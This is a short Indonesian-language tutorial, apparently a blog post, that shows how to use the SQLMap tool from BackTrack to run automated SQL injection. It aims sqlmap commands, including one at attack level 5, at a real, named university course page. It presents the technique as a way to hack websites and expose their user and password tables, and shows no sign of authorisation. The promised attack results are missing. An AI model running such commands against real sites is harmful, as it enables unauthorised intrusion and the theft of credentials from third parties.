SQLMap merupakan salah satu aplikasi yang terdapat pada backtrack untuk melakukan SQL Injection secara otomatis. SQL Injection adalah salah satu cara untuk melakukan hack pada suatu website melalui url yang ada dengan memanfaatkan kelemahan dari programmer yaitu pada bagian $_GET. Hal ini dapat dimanipulasi hingga dapat menampilkan daftar tabel user dan password daripada website tersebut.
Sintaks untuk melakukan sql injection pada sqlmap adalah :
./sqlmap.py –u <alamat website>
Contoh penggunaan pada website cls.maranatha.edu/fakultas/fit/s1if/course/view.php?id=115
./sqlmap.py –u cls.maranatha.edu/fakultas/fit/s1if/course/view.php?id=115
Berikut adalah hasil percobaan terhadap alamat website tersebut :
Bila kita ingin meningkatkan level daripada penyerangan sql injection yang dilakukan manual oleh sql map maka kita dapat melakukannya dengan cara
Sintaks untuk menggunakan sqlmap dan menaikkan level serangan daripada sql injection yang dilakukan :
./sqlmap.py –u <alamat website> --level=5
Contoh penggunaan menggunakan level pada website cls.maranatha.edu/fakultas/fit/s1if/course/view.php?id=115 :
./sqlmap.py –u cls.maranatha.edu/fakultas/fit/s1if/course/view.php?id=115 --level=5
Berikut adalah contoh penggunaan menggunakan level 5 pada sqlmap
